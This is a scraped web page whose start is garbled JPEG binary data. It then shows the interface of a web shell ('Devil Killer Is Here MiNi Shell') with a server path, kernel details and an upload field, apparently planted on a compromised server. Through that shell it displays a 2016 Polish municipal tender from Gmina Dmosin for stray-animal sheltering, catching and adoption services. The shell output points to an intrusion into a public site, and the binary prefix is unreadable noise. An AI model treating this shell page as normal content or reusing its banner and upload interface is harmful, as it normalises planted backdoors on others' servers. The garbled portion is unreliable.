JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161202/358082-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.dmosin.pl' target='_blank'>http://www.bip.dmosin.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 358082 - 2016
              z dnia 2016-12-02 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Dmosin: Hotelowanie, zapewnienie opieki bezdomnym zwierzętom wyłapanym z terenu gminy Dmosin w latach wcześniejszych i podejmowanie działań prowadzących do adopcji hotelowanych zwierząt oraz wyłapywanie, zapewnienie opieki bezdomnym zwierzętom z terenu gminy Dmosin i prowadzenie akcji adopcyjnej w okresie od 01.01.2017r. do 31/12.2017r. <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Dmosin, krajowy numer identyfikacyjny
              75014821300000, ul.
              Dmosin 
              9,
              95061  
              Dmosin, woj.
              łódzkie, państwo
              Polska, tel.
              468 747 485, e-mail
              ugdmosin.zp@wp.pl, faks
              468 746 294.
              <br />
              Adres strony internetowej (URL): www.dmosin.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.dmosin.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.dmosin.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Zamawiajacy wymaga złozenia ofert w formie pisemnej<br />
                Adres:
                <br />siedziba Zamawiajacego: Urząd Gminy Dmosin, Dmosin 9, 95-061 Dmosin, pokój 15a .Godziny pracy od poniedziałku do piątku godz. 8:00-16:00</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Hotelowanie, zapewnienie opieki bezdomnym zwierzętom wyłapanym z terenu gminy Dmosin w latach wcześniejszych i podejmowanie działań prowadzących do adopcji hotelowanych zwierząt oraz wyłapywanie, zapewnienie opieki bezdomnym zwierzętom z terenu gminy Dmosin i prowadzenie akcji adopcyjnej w okresie od 01.01.2017r. do 31/12.2017r. <br /><b>Numer referencyjny: </b>Z.P. 271.PN.7.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>	Opis przedmiotu zamówienia.
1.	Przedmiotem zamówienia jest hotelowanie, zapewnienie opieki bezdomnym zwierzętom wyłapanym z terenu gminy Dmosin w latach wcześniejszych i podejmowanie działań prowadzących do adopcji hotelowanych zwierząt oraz wyłapywanie, zapewnienie opieki bezdomnym zwierzętom z terenu gminy Dmosin i prowadzenie akcji adopcyjnej w okresie od 01.01.2017r. do 31/12.2017r. 
2.	Szczegółowy opis  przedmiotu zamówienia stanowi Załącznik nr 1 do SIWZ. 
3.	Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych we wzorze umowy stanowiącym Załącznik nr 2 dla części I  i Załacznik nr 3 dla części 2 do SIWZ.
4.	Wspólny Słownik Zamówień CPV:   98380000-0 usługi psiarni 
        85200000-1 usługi weterynaryjne
5.	Zamawiający dopuszcza możliwości składania ofert częściowych.
Przedmiotowe zamówienie zostało podzielone na dwie części:
I część  Hotelowanie zapewnienie opieki bezdomnym zwierzętom wyłapanym z terenu gminy Dmosin w latach wcześniejszych i podejmowanie działań prowadzących do adopcji hotelowanych zwierząt w okresie od 01.01.2017r. do 31.12.2017r.
II część Wyłapywanie oraz zapewnienie opieki bezdomnym zwierzętom z terenu gminy Dmosin i prowadzenie akcji adopcyjnej w okresie od 01.01.2017r. do 31.12.2017r. 
Przedmiotem zamówienia jest: 

Część I

Hotelowanie zapewnienie opieki bezdomnym zwierzętom wyłapanym z terenu gminy Dmosin w latach wcześniejszych i podejmowanie działań prowadzących do adopcji hotelowanych zwierząt w okresie od 01.01.2017r. do 31.12.2017r.
Zakresem zamówienia jest świadczenie usług polegających na:
a)	przejęcie przez Wykonawcę opieki nad bezdomnymi zwierzętami znajdującymi się w Schronisku - Hotel Dla Zwierząt i Ptactwa Domowego Longin Siemiński, Gabinet weterynaryjny, Schronisko, Centrum Rehabilitacyjno-Szkoleniowo-Adopcyjne, 92-411 Łódź, ul. Kosodrzewiny 56 lok.2 w ilości 101 szt.  i w schronisku w Zgierzu ul. Urocza 9 w ilości 2 szt.  oraz ich przewiezienie do schroniska prowadzonego przez Wykonawcę na jego koszt i przy użyciu własnych środków transportowych Wykonawcy. Wykaz zwierząt w załączniku nr 8 do SIWZ
b)	zapewnienie wyżywienia, opieki (w tym weterynaryjnej) nad bezdomnymi zwierzętami pochodzącymi z terenu gminy Dmosin w okresie obowiązywania umowy.
c)	 prowadzenie aktywnych działań zmierzających do oddania jak największej ilości hotelowanych zwierząt do adopcji.
Szczegółowy przedmiot zamówienia dla część I:
1.	przejęcie oraz przetransportowanie na swój koszt wszystkich wyłapanych zwierząt z terenu Gminy Dmosin aktualnie znajdujących się pod opieką firmy Hotel Dla Zwierząt i Ptactwa Domowego Longin Siemiński, Gabinet Weterynaryjny, Schronisko, Centrum Rehabilitacyjno-Szkoleniowo-Adopcyjne z siedzibą ul. Kosodrzewiny 56 lok. 2, 92-411 Łódź , filia Wojtyszki 18 ok. 101 szt. i w schronisku w Zgierzu , ul. Urocza, 9, 95-100 Zgierz w ilości 2 szt., do schroniska prowadzonego przez Wykonawcę oraz sprawowanie opieki nad tymi zwierzętami w okresie obowiązywania umowy. Sprawdzenie, w dniu odbioru zwierząt, czy wszystkie zwierzęta są zaczipowane i w przypadku braku czipu wszczepienie nowego na koszt Wykonawcy.
2.	prowadzenie ewidencji zwierząt w sposób umożliwiający identyfikację zwierząt. Ewidencja zwierząt winna zawierać minimum dwie fotografie zwierzęcia przedstawiające  całe zwierzę w ujęciu bocznym (prawa i lewa strona ciała), wraz z opisem zwierzęcia zawierającym w szczególności rasę, płeć, maść oraz wielkość oraz numer czipa.
3.	Prowadzenie działań adopcyjnych zwierząt z terenu gminy Dmosin poprzez poszukiwania chętnych do przyjęcia zwierząt i oddanie do adopcji zwierząt,
4.	bezzwłoczne informowanie Zamawiającego o przekazaniu zwierzęcia do adopcji lub jego zgonie,
5.	sprawowanie całodobowej opieki nad zwierzętami, w zakres której wchodzi także wyżywienie, schronienie, 
6.	zapewnienie pomieszczeń boksów do przetrzymywania zwierząt w odpowiednich warunkach, zgodnie z obowiązującymi przepisami prawa w tym:zabezpieczenie zwierząt przed negatywnym wpływem czynników atmosferycznych,
      takich jak: deszcz, śnieg, wiatr, szkodliwe działanie słońca, zapewnienia zwierzętom    
      odpowiedniego oświetlenia, oddzielenie zwierząt agresywnych od zwierząt 
      nieprzejawiających takiej cechy;
7.	sprawowanie opieki weterynaryjnej, polegającej na:
a)	15- dniowej kwarantannie,
b)	odpchleniu i odrobaczeniu,
c)	szczepieniu i leczeniu,
d)	badaniach profilaktycznych
e)	leczeniu zwierząt w przypadku ich zachorowania, oraz w uzasadnionych przypadkach poddanie zwierząt eutanazji.
8.  Wykonawca zobowiązany jest do:
1) Przestrzegania przepisów prawa zawartych w:
a) ustawie z dnia 21 sierpnia 1997r. o ochronie zwierząt (Dz. U. z 2013r. poz. 856 z
późniejszymi zmianami),
b) ustawie z dnia 11 marca 2004r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób
zakaźnych zwierząt (Dz. U. z 2014r. poz. 1539 z późniejszymi zmianami),
c) ustawie z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach 
(Dz. U. z 2016r. poz. 250 z póź.zm.),
d) we właściwych rozporządzeniach wydanych na podstawie ww. ustaw,
2) zachowania bezpieczeństwa, porządku i czystości podczas realizacji przedmiotu umowy,
3) powierzenia wykonywania obowiązków i zadań objętych przedmiotem zamówienia wyłącznie osobom posiadającym wymagane do tego kwalifikacje i uprawnienia 
oraz zaopatrzenia ich w odpowiedni sprzęt zapewniający bezpieczeństwo ludzi i zwierząt,
4) zapewnienia we własnym zakresie zaplecza organizacyjnego, personalnego i narzędzi
koniecznych do wykonywania przedmiotu umowy,
5) Wykonawca oświadcza i zapewnia Zamawiającego, że posiada zezwolenie 
na prowadzenie działalności w zakresie objętym niniejszą umową i koniecznym 
do prowadzenia działalności w sferze ochrony nad bezdomnymi zwierzętami, zgodnie 
z art. 7 ust. 1 ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku 
w gminach oraz zobowiązuje się do posiadania i uaktualniania powyższego zezwolenia przez cały okres realizacji umowy. W przypadku, gdy zezwolenie traci moc obowiązującą, w trakcie trwania niniejszej umowy Wykonawca obowiązany jest do uzyskania aktualnego zezwolenia najpóźniej w dniu poprzedzającym dzień wygaśnięcia dotychczasowych uprawnień.
6) Zamawiający zobowiązany jest do natychmiastowego poinformowania Wykonawcy 
w przypadku wystąpienia objawów choroby zakaźnej, zwalczanej z urzędu na swoim terenie. Analogiczny obowiązek ciąży na Wykonawcy wobec Zamawiającego.
7) Za wszelkie wypadki i szkody oraz ich następstwa wynikłe w związku z realizacją umowy odpowiada wyłącznie Wykonawca.
8) Za działania lub zaniechania swoich pracowników, współpracowników, podwykonawców uczestniczących w wykonywaniu przedmiotu umowy Wykonawca odpowiada tak, jak za działania lub zaniechania własne.

Część II
Wyłapywanie oraz zapewnienie opieki bezdomnym zwierzętom z terenu gminy Dmosin 
i prowadzenie akcji adopcyjnej w okresie od 01.01.2017r. do 31.12.2017r. 
Zakresem zamówienia jest świadczenie usług polegających na:
d)	odłapywaniu, oraz przewóz do schroniska dla bezdomnych zwierząt odłapanych bezdomnych zwierząt z terenu gminy Dmosin i umieszczanie ich w schronisku,
e)	zapewnienie wyżywienia, opieki (w tym weterynaryjnej) nad bezdomnymi zwierzętami pochodzącymi z terenu gminy Dmosin w okresie obowiązywania umowy.
Szczegółowy przedmiot zamówienia :
1.  wyłapanie, w czasie nie dłuższym niż 10 godzin (w czasie wskazanym w ofercie Wykonawcy) od przyjęcia telefonicznego zgłoszenia, zwierzęcia bezdomnego z terenu Gminy Dmosin wraz z jego transportem do schroniska i zaczipowaniem. Szacuje się, że w okresie do 31.12.2017r 
do odłapania będzie maksymalnie 10 zwierząt,
2. prowadzenie ewidencji bezdomnych zwierząt, wyłapanych na terenie gminy Dmosin, w sposób umożliwiający ich identyfikację polegający w szczególności na opisaniu danego zwierzęcia (rasa, płeć, maść, wielkość i nr czip) wraz z podaniem daty jego przyjęcia oraz sporządzenie, w dniu przyjęcia do Schroniska a także dokumentacji fotograficznej zwierzęcia 3. po odłapaniu zwierzęcia i umieszczeniu w schronisku przesyłanie w wersji papierowej lub drogą elektroniczną co najmniej dwóch fotografii przedstawiających  całe zwierzę w ujęciu bocznym (prawa i lewa strona ciała), wraz z opisem zwierzęcia zawierającym w szczególności rasę, płeć, maść oraz wielkość i nr czipa,
4. Prowadzenie działań adopcyjnych zwierząt z terenu gminy Dmosin poprzez poszukiwania chętnych do przyjęcia zwierząt i oddanie do adopcji zwierząt, Wykonawca jest zobowiązany do zapewnienia oddania do adopcji zwierząt odłapanych z terenu gminy Dmosin w ilości wskazanej w złożonej ofercie,
5. bezzwłoczne informowanie Zamawiającego o przekazaniu zwierzęcia do adopcji lub jego zgonie, 
6. sprawowanie całodobowej opieki nad zwierzętami, w zakres której wchodzi także wyżywienie, schronienie, opieka weterynaryjna,
7. zapewnienie pomieszczeń boksów do przetrzymywania zwierząt w odpowiednich warunkach, zgodnie z obowiązującymi przepisami prawa w tym: zabezpieczenie zwierząt przed negatywnym wpływem czynników atmosferycznych,  takich jak: deszcz, śnieg, wiatr, szkodliwe działanie słońca, zapewnienia zwierzętom  odpowiedniego oświetlenia, oddzielenie zwierząt agresywnych od zwierząt nieprzejawiających takiej cechy;
8. sprawowanie opieki weterynaryjnej, polegającej na:
                             a)  15 dniowej kwarantannie,
b) odpchleniu i odrobaczeniu,
c) szczepieniu i leczeniu,
d) badaniach profilaktycznych
f) leczeniu zwierząt w przypadku ich zachorowania, oraz w uzasadnionych przypadkach poddanie zwierząt eutanazji.
9. powiadomienie Zamawiającego o rozpoczęciu i zakończeniu wykonywania zlecenia, 
po otrzymaniu od Zamawiającego zgłoszenia, o którym mowa w ppkt 1.

10. Szczegółowy szacunkowy zakres zlecenia obejmuje następujące zadania jednostkowe:
a)	odłapanie i dostarczenie do schroniska zwierzęcia oraz oznaczenie chipem  5 szt.,
b)	wykonanie czynności opisanych w punkcie 1) w stosunku do kolejnego zwierzęcia odłapanego w tym samym miejscu  2 szt.,
c)	odbiór (usługa nie zawiera odłapania zwierzęcia) jednego zwierzęcia
lub więcej w tym samym miejscu i czasie  ich transport do schroniska i oznaczenie chipem  3 szt.,
d)	utrzymanie zwierzęcia (tj. psów i kotów)  odłapanego w okresie realizacji zamówienia 10 -szt.,
e)	dojazdy w przypadku zgłoszenia przez Zleceniodawcę zwierzęcia, którego zlokalizowanie i odłapanie będzie niemożliwe  5 szt.
11. Zadania jednostkowe, będą realizowane na podstawie zgłoszeń dokonywanych przez uprawnionego pracownika Zamawiającego.
12. Zamawiający dopuszcza zmianę ilości poszczególnych rodzajów zadań jednostkowych, szacunkowo określonych w pkt. 10, z zastrzeżeniem nieprzekraczalności maksymalnego wynagrodzenia, o którym mowa w § 3 ust. 2 wzoru umowy.
13. Wykonawca zobowiązany jest do:
1) Przestrzegania przepisów prawa zawartych w:
a) ustawie z dnia 21 sierpnia 1997r. o ochronie zwierząt (Dz. U. z 2013r. poz. 856 z
późniejszymi zmianami),
b) ustawie z dnia 11 marca 2004r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt (Dz. U. z 2014r. poz. 1539 z późniejszymi zmianami),
c) ustawie z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach 
(Dz. U. z 2016r. poz. 250),
d) we właściwych rozporządzeniach wydanych na podstawie ww. ustaw,
2) zachowania bezpieczeństwa, porządku i czystości podczas realizacji przedmiotu umowy,
3) powierzenia wykonywania obowiązków i zadań objętych przedmiotem zamówienia wyłącznie osobom posiadającym wymagane do tego kwalifikacje i uprawnienia 
oraz zaopatrzenia ich w odpowiedni sprzęt zapewniający bezpieczeństwo ludzi                       i zwierząt,
4) zapewnienia we własnym zakresie zaplecza organizacyjnego, personalnego                         i narzędzi koniecznych do wykonywania przedmiotu umowy,
5) Wykonawca oświadcza i zapewnia Zamawiającego, że posiada zezwolenie 
na prowadzenie działalności w zakresie objętym niniejszą umową i koniecznym 
do prowadzenia działalności w sferze ochrony nad bezdomnymi zwierzętami, zgodnie 
z art. 7 ust. 1  ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach oraz zobowiązuje się do posiadania i uaktualniania powyższego zezwolenia przez cały okres realizacji umowy. W przypadku, gdy zezwolenie traci moc obowiązującą, w trakcie trwania niniejszej umowy Wykonawca obowiązany jest do uzyskania aktualnego zezwolenia najpóźniej w dniu poprzedzającym dzień wygaśnięcia dotychczasowych uprawnień.
6) Zamawiający zobowiązany jest do natychmiastowego poinformowania Wykonawcy w przypadku wystąpienia objawów choroby zakaźnej, zwalczanej z urzędu na swoim terenie. Analogiczny obowiązek ciąży na Wykonawcy wobec Zamawiającego.
7) Za wszelkie wypadki i szkody oraz ich następstwa wynikłe w związku z realizacją umowy odpowiada wyłącznie Wykonawca.
8) Za działania lub zaniechania swoich pracowników, współpracowników, podwykonawców uczestniczących w wykonywaniu przedmiotu umowy Wykonawca odpowiada tak, jak za działania lub zaniechania własne.
14.  W ramach realizacji zobowiązania, o którym mowa w ust. 1 pkt 3 Wykonawca zapewnia adopcję co najmniej (  ilości podanej w ofercie) zwierzęcia/zwierząt w każdym kwartale obowiązywania umowy, począwszy od miesiąca, w którym odłapano pierwsze zwierzę z terenu gminy Dmosin. Obowiązek powyższy jest wyłączony w przypadku, gdy w danym miesiącu nie odłapano żadnego zwierzęcia z terenu gminy Dmosin, a w schronisku, do którego Wykonawca przewozi zwierzęta, nie są hotelowane żadne zwierzęta odłapane z terenu gminy Dmosin na podstawie niniejszej umowy. Termin oddania do adopcji zwierzęcia/zwierząt w ilości wskazanej w zdaniu pierwszym upływa z ostatnim dniem każdego miesiąca kalendarzowego, w którym w schronisku znajdują się zwierzęta odłapane z terenu gminy Dmosin.


1.	Zamawiający wymaga zatrudnienia przez wykonawcę lub podwykonawcę w każdej części zamówienia, na podstawie umowy o pracę osób wykonujących następujące czynności w zakresie realizacji zamówienia:
a)	Sprawowanie codziennej opieki karmienia zwierząt  - 1 osoba
b)	Sprzątanie boksów dla zwierząt - 1 osoba
9.1. Wykonawca zobowiązuje się, że pracownicy świadczący wyżej wymienione usługi będą w okresie realizacji 
umowy zatrudnienia na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974r. Kodeks pracy (Dz.U. z 2016r. ,poz. 1666 )
2. W trakcie realizacji zamówienia zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec wykonawcy odnośnie do spełniania przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 1 czynności. Zamawiający uprawniony jest w szczególności do: 
a)	żądania oświadczeń i dokumentów w zakresie potwierdzenia spełniania ww. wymogów 
i dokonywania ich oceny,
b)	żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww. wymogów,
c)	przeprowadzania kontroli na miejscu wykonywania świadczenia.
3. W trakcie realizacji zamówienia na każde wezwanie zamawiającego w wyznaczonym w tym wezwaniu        terminie wykonawca przedłoży zamawiającemu wskazane poniżej dowody w celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę osób wykonujących  wskazane w punkcie 9 czynności w trakcie realizacji zamówienia:
a) oświadczenie wykonawcy lub podwykonawcy o zatrudnieniu na podstawie umowy o pracę osób wykonujących czynności, których dotyczy wezwanie zamawiającego. Oświadczenie to powinno zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonują osoby zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, rodzaju umowy o pracę i wymiaru etatu oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniu wykonawcy lub podwykonawcy;
b) zaświadczenie właściwego oddziału ZUS, potwierdzające opłacanie przez wykonawcę lub podwykonawcę składek na ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia na podstawie umów o pracę za ostatni okres rozliczeniowy;
c) poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię dowodu potwierdzającego zgłoszenie pracownika przez pracodawcę do ubezpieczeń, zanonimizowaną w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych.
